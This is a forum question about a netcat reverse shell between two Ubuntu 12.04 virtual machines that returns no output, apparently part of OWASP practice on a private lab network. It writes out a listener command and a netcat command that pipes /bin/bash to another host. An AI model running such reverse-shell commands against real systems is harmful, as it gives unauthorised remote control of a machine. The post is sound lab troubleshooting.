# Why is netcat remote shell not returning any output on ubuntu 12.04?

Tags: server, bash, remote-access, netcat

I'm connecting to a server I have on my laptop, both are on the same vmnet
and both systems are Ubuntu 12.04 LTS.

In order to connect I use reverse shell from the web sever.
First I start listening on my host by typing `sudo nc -l -k -v 10101` and then I start the 
listen by going to my webserver and typing `/bin/nc 172.16.55.1 10101 /bin/bash`

On the host end I get a notification saying `connection from 172.16.55.128 port 10101 [tcp/*] accepted`

After this, instead of having a working connection (i.e write `ls` in host and getting my web-server's output) I  get nothing in my host, and in my web server I can see the same input I wrote from the host (i.e all I see appear is `ls`)

From past experience when I used remote shell my host changed from `me@host:~$` to something else indicating I'm now in a remote system for example `me@remotewebserver:~$` here this is not the case, I have nothing before the part where I type, not even the `me@host` that was there.

Comment: May I ask why you don't just `ssh user@server`?

Comment: yes ofc. im actually doing this as reverse shell from on OWASP - and i don't know how to run a reverse shell ssh.